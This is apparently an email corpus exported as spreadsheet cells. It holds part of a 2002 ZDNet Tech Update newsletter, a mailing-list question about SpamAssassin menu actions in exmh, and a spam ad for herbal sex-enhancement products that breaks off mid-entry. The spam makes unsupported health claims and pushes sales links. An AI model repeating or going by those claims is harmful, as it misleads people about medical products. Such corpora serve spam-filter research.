 the first benchmark that the disparate organizations have agreed upon, others to  follow include &lt;b&gt;Cisco IOS&lt;/b&gt; for 
 routers, Solaris, Linux and HP-UX. Reaching agreement on these benchmarks will not be a walk in the park.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRkpabR5w8PF_jEuwteR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0EHeejcKVM_4Mc3148lk6yR" &gt;
 &lt;b&gt;Microsoft squashes Windows 2000 bugs&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
  &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071702_ballmer_quote.gif" width="220" height="150" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;As the rhetoric turns&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Last year, &lt;b&gt;Steve Ballmer&lt;/b&gt; called the GPL on which Linux is based a "&lt;b&gt;cancer&lt;/b&gt;." This year, &lt;b&gt;Linux is a "unique 
 competititor&lt;/b&gt;." The emergence of Linux as a serious competitor to Windows has forced Microsoft to change the way it 
 approaches customers, Microsoft's CEO acknowledged at this week's Fusion 2002. Microsoft traditionally has played its &lt;b&gt;"low price, high volume"&lt;/b&gt; game against IBM, Oracle and others. Now it must figure out how to beat Linux, which has an even lower cost -- free.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVIg9GzLLMTRnU3P83P5XlR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;Wi-Fi can wait&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The next iteration of Wi-Fi (aka &lt;b&gt;802.11a&lt;/b&gt;) may be getting a lot of interest, but rolling it out now, says &lt;b&gt;Gartner&lt;/b&gt;, would be jumping 
 the gun. The anointed successor to the &lt;b&gt;802.11b&lt;/b&gt; modulation scheme provides up to five times the throughput over its predecessor. When will it be ready for prime time?
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgsVMu5BZxeE4rbg6amtI4R" &gt;
 &lt;b&gt;Find out why you should wait&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XPQSrqAZWssDLfzpHOCerR" &gt;
 &lt;b&gt;'Rainbow' coalition to spread wireless&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;More large-scale worm attacks? Brace yourself&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It's been a year since the &lt;b&gt;Code Red&lt;/b&gt; worm wreaked havoc on the Net. What's changed? Internet worms have become &lt;b&gt;much 
 more robust&lt;/b&gt; since Code Red. And that doesn't bode well, since antivirus software hasn't kept up with all the changes. So 
 far in 2002, we've been lucky. &lt;b&gt;Robert Vamosi&lt;/b&gt; tells you how to prepare for future threats.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRdag3AZ_ZZEL2t1VlTK8yiR" &gt;
 &lt;b&gt;Here's what he recommends&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Macworld hears roar of Jaguar&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 At this week's Macworld, Apple CEO &lt;b&gt;Steve Jobs&lt;/b&gt; heralded the early arrival (August 24) of &lt;b&gt;Mac OS X version 10.2&lt;/b&gt; 
 (code-named Jaguar), which features improved search features plus &lt;b&gt;QuickTime 6&lt;/b&gt; with support for MPEG-4. Also: An iPod 
 for Windows, a 17-inch flat-panel iMac, new charges for iTools Web services and a leg-up for Mac Office.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizcfoXtxOD_7DQESNPe-i4R" &gt;
 &lt;b&gt;Read the full report&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINniBiOzcAyjHpx8lOheMncR" &gt;
 &lt;b&gt;What David Coursey wants from Macworld&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 6--&gt;
 &lt;!--&lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602winbook.jpg" width="220" height="207" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; says the battle between .Net and Java isn't important. Web services' future is held 
 hostage by an unresolved debate over &lt;b&gt;industry standards&lt;/b&gt;.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPWu8ZhI-1ywvjsK-FdLPRR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:david.berlind@cnet.com"&gt;&lt;b&gt;david.berlind@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;a href="#top"&gt;&lt;b&gt;Back to top&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;
         &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;/table&gt;
 &lt;!---Editors choice---&gt;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&lt;!--bottom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width=12 bgcolor="#ffffff"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="12" height=1&gt;&lt;/td&gt;
 &lt;td width=564 bgcolor="#ffffff"&gt;
 &lt;br&gt;&lt;br&gt;
   &lt;!-------- also on zdnet -----------&gt;
         &lt;font face="arial, helvetica" size="+1" color="#990000"&gt;&lt;b&gt;Also on Tech Update Today&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
         &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;
         &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;/table&gt;
  &lt;!-- QUOTE BLOCK --&gt;
  &lt;!-- 
         &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;YOU SAID IT&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
         &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
         &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMEOON54Uywq2NRJSBTZR" &gt;&lt;b&gt;Microsoft: The real remedy&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;p&gt;
 &lt;img src="http://techupdate.zdnet.com/techupdate/i/quote_blue_left.gif" align="left"&gt;
 Web services will require application-level firewalls
 Firewalls were built to plug network holes and shield
 application data. But Gartner says the integration-heavy
 demands of Web services require securing information at
 the application level. 
 http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2864540,00.html
 &lt;img src="http://techupdate.zdnet.com/techupdate/i/quote_blue_right.gif" align="right"&gt;
 &lt;p align="right"&gt;
 &lt;font size="-1" color="#990000"&gt;&lt;b&gt;-- Richard Spellman in response to &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9II1HwEzeFOPq1FsnynR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;COMMENTARY&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BskDUCvADLF5vLk7KCgFeR" &gt;
 &lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; says the battle between .Net and Java isn't important. Web services' future is held 
 hostage by an unresolved debate over &lt;b&gt;industry standards&lt;/b&gt;.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;DOWNLOADS&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pV9mjCJM5pAEVgnfqGsJPR" &gt;
 &lt;b&gt;Gather Net information&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Conduct Ping, Traceroute, Finger, and Whois queries, as well as gather extensive IP information with this handy kit of 
 &lt;b&gt;network tools&lt;/b&gt;.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
 				        &lt;!-- coming tomorrow --&gt;
         &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;PREVIOUSLY ON TECH UPDATE TODAY&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
         &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
         &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULs_DvcAlf3Gl22vbAOyenR" &gt;
 &lt;b&gt;Software contracts: Clause for alarm&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Be wary of fine print. Learn to spot &lt;b&gt;red flags&lt;/b&gt; in corporate software contracts before you sign on the dotted line. 
 &lt;br&gt;
 &lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- /coming tomorrow --&gt;
 &lt;!-- ### --&gt;
 &lt;table width="100%"  cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff"&gt;
 &lt;tr bgcolor="#999999"&gt;&lt;td colspan="7" height="15"&gt;&lt;font face="ms sans serif, geneva" color="#ffffff" size="-2"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=3&gt;&lt;b&gt;Crucial Clicks--products worth looking at&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVce3AIRbVVqS8CMB0qvseR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwTau9La-ra9-0t3VVat9yR" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLumB-EX3VynhNBuCqlR" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMxeleLOYuBBBkqU8niQ74R" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxKvGdWEeFPcZsjpRp-LrR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwZWbFlXASOnO8CtmMgRR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dgic7DXD70VOf0m8P9ZR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPB8prAmlS7hU6coezkBZXdR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IMRh3ybPpVb8HYULuonXiR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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&lt;br&gt;
 &lt;br&gt;
    &lt;!-------- elsewhere -----------&gt;
         &lt;font face="arial, helvetica" size="+1" color="#990000"&gt;&lt;b&gt;Elsewhere on ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
         &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;
         &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;/table&gt;   
 		&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;BR&gt;
 &lt;b&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_wmjbxsIC1b2OB8OEPR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTWYQNJwxhOmI_uIUEknR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw8dIX_JaylIO7r3fxeR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jK69mII81u0PT_Qv1yR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQl1uKGSM_svdGheo-lR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;   
       &lt;/font&gt;  
 &lt;br&gt;&lt;/td&gt;
 &lt;td width=12 bgcolor="#ffffff"&gt;&lt;img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
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /bottom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href='http://clickthru.online.com/Click?q=0e--e3TznQuupZWG3gTQ1cnHdvA6GQwW9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMu1JOaiAv2Y9ZZvQKrR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVpW2AXfCGLs-y39w-_lR"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href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFMoY0pIKlsTn8N_Jj9R" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWGwVXck_6g_9-hwkp_WEcR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUkHp7nWOl5vnMUN5xspoRR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvyaesXmIiSupcptbPMPR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFg3AixB9R0CGk_HtsonR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHO5RflOY0NpbnpTbdL3eR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsJFTK2vn2FjAi_TOlRfXPR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyI69pqKbDENBEZdihv9KnR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfscKTR7TWEpiaRL6DCwoliR" style="color: #fff"&gt;Contact us&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=0d-3a5unDr3Rb7FCoV756XJrJ8XisRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: integrating a couple spamassassin actions into the More... menu
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm positive some of you folks have done this, so perhaps someone can just
 drop me a pointer to where it's already been discussed?
 In particular, I was going to have a menu entry available for:
 o  remove the SA markup from a message
 o  add/remove addresses to whitelist
 Help!  :-)  I've never done customization of this type to my exmh install.
 I'm running version 2.4 (6/23/2000) on RedHat 7.3
 --Harlan
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Men &amp; Women, Spruce up your sex life!                EWFXV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</si>
  <si>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&lt;title&gt;Vigoral Ad&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"460" height=3D"393" cellpadding=3D"0" cells=
 pacing=3D"0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"460" height=3D"387" align=3D"left"&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"98%" height=3D"79" bgcolor=3D"#FFFF99"&gt;
     &lt;tr&gt;
       &lt;th width=3D"71%" height=3D"73" align=3D"center"&gt;&lt;font size=3D"3" co=
 lor=3D"#FF0000"&gt;&lt;b&gt;Vigoral Herbal Sex Enhancers&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;b&gt;&lt;font fac=
 e=3D"Times New Roman" color=3D"#FF0000" size=3D"3"&gt;Direct from
         the lab to you!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" =
 color=3D"#0066FF"&gt;We
         are Now Offering 3 Unique Products to help increase your moments w=
 ith
         that special someone @ &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" col=
 or=3D"#FF0000"&gt;Only
         $24.99 each!!!&lt;/font&gt;&lt;/b&gt;&lt;/th&gt;
       &lt;th width=3D"29%" height=3D"73" align=3D"center"&gt;&lt;a href=3D"http://w=
 ww.medievalmedia.com/"&gt;&lt;img border=3D"0" src=3D"http://www.thezs.com/0025/=
 freeshipping1.gif" width=3D"160" height=3D"80"&gt;&lt;/a&gt;&lt;/th&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"59%" height=3D"351"&gt;
     &lt;tr&gt;
       &lt;td width=3D"88%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.thezs.com/0025/SUPER.jpg" width=3D"138" height=3D=
 "72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"80%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.thezs.com/0025/SUPERb.jpg" width=3D"139" height=3D=
 "72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"88" align=3D"center" bordercolor=3D"#FF=
 FF99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" borde=
 rcolordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img bord=
 er=3D"0" src=3D"http://www.thezs.com/0025/SUPERv.jpg" width=3D"163" height=
 =3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.thezs.com/0025/supervigoral.jpg" =
 width=3D"91" height=3D"158"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" col=
 or=3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.thezs.com/0025/vigorgel.jpg" widt=
 h=3D"90" height=3D"160"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=3D=
 "#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.thezs.com/0025/vigorette.jpg" wid=
 th=3D"98" height=3D"159"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=3D=
 "#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;M=
 en,
         Increase Your Energy Level &amp;amp; Maintain Stronger Erections!&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;E=
 dible,
         Specially Formulated Lubricant For Everyone!&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"87" style=3D"color: #FF0000; font-famil=
